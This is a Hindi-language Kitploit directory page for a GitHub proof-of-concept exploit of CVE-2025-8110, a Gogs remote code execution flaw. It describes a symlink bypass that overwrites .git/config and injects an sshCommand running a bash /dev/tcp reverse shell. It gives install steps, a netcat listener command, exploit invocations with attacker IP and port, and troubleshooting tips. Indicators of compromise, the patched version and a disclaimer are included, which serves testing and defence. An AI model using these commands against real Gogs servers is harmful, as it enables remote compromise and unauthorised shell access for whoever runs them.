Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-8110 — Gogs RCE PoC - CVE-2025-8110 | Kitploit
उपकरण/GitHubGitHub/x4brozer/cve-2025-8110
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubx4brozer/cve-2025-8110

CVE-2025-8110

Gogs RCE PoC - CVE-2025-8110

रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Gogs RCE एक्सप्लॉइट (CVE-2025-8110)

Python License

CVE-2025-8110 के लिए प्रूफ ऑफ कॉन्सेप्ट - सिमलिंक बायपास और sshCommand इंजेक्शन के माध्यम से Gogs में रिमोट कोड एक्ज़ीक्यूशन।

विवरण

यह एक्सप्लॉइट Gogs API में सिमलिंक बायपास का दुरुपयोग करके .git/config को ओवरराइट करता है और दुर्भावनापूर्ण sshCommand इंजेक्ट करता है जो एक रिवर्स शेल निष्पादित करता है।

आवश्यकताएँ

  • Python 3.12+
  • Git स्थापित
  • वैध Gogs क्रेडेंशियल्स
  • Gogs API टोकन

स्थापना

root@kitploit:~
git clone https://github.com/X4BROZER/CVE-2025-8110.git
cd CVE-2025-8110
pip install -r requirements.txt

तर्क विवरण -u, --url लक्ष्य Gogs URL (जैसे, http://target:3000) -U, --username Gogs उपयोगकर्ता नाम -P, --password Gogs पासवर्ड -t, --token Gogs API टोकन -lh, --host रिवर्स शेल के लिए आपका IP -lp, --port लिसनर के लिए आपका पोर्ट -x, --proxy प्रॉक्सी सक्षम करें (localhost:8080)

उपयोग

टूल डाउनलोड करें

चरण 1: API टोकन प्राप्त करें

Gogs में लॉगिन करें → सेटिंग्स → एप्लिकेशन → टोकन जनरेट करें

चरण 2: लिसनर शुरू करें

root@kitploit:~
nc -lvnp 4444

चरण 3: एक्सप्लॉइट चलाएँ

root@kitploit:~
python3 exploit.py -u http://target:3000 -U <USERNAME GOGS> -P <PASSWORD GOGS> -t <TOKEN> -lh <ATTACKER IP> -lp <ATTACKER PORT>

उदाहरण

root@kitploit:~
python3 exploit.py -u http://localhost:3001 -U amine -P amine -t 44f4e64a1e6353f247050055aa0d3cc13b577ac3 -lh 10.10.17.134 -lp 4444

यह कैसे काम करता है

  • .git/config के लिए सिमलिंक के साथ रिपॉजिटरी बनाता है
  • सिमलिंक में लिखने के लिए PutContents API का उपयोग करता है
  • sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' # इंजेक्ट करता है
  • Gogs कमांड निष्पादित करता है → रिवर्स शेल

समस्या निवारण

समस्या समाधान लॉगिन विफल उपयोगकर्ता नाम/पासवर्ड जांचें रिपॉजिटरी निर्माण विफल API टोकन पुनर्जनित करें रीड टाइमआउट सामान्य - लिसनर जांचें कोई शेल नहीं फायरवॉल जांचें, अलग पोर्ट आज़माएँ

समझौता संकेतक

  • यादृच्छिक 8-अक्षर वाले रिपॉजिटरी नाम
  • रिपोज में malicious_link सिमलिंक
  • .git/config में sshCommand

उपचार

Gogs v0.13.4 या बाद के संस्करण में अपडेट करें:

root@kitploit:~
wget https://dl.gogs.io/v0.13.4/gogs_v0.13.4_linux_amd64.tar.gz
tar -xzf gogs_v0.13.4_linux_amd64.tar.gz

कानूनी अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण के लिए है। अनधिकृत पहुँच अवैध है।

क्रेडिट

  • खोज: Wiz Research
  • मूल PoC: zAbuQasem
  • एक्सप्लॉइट: X4BROZER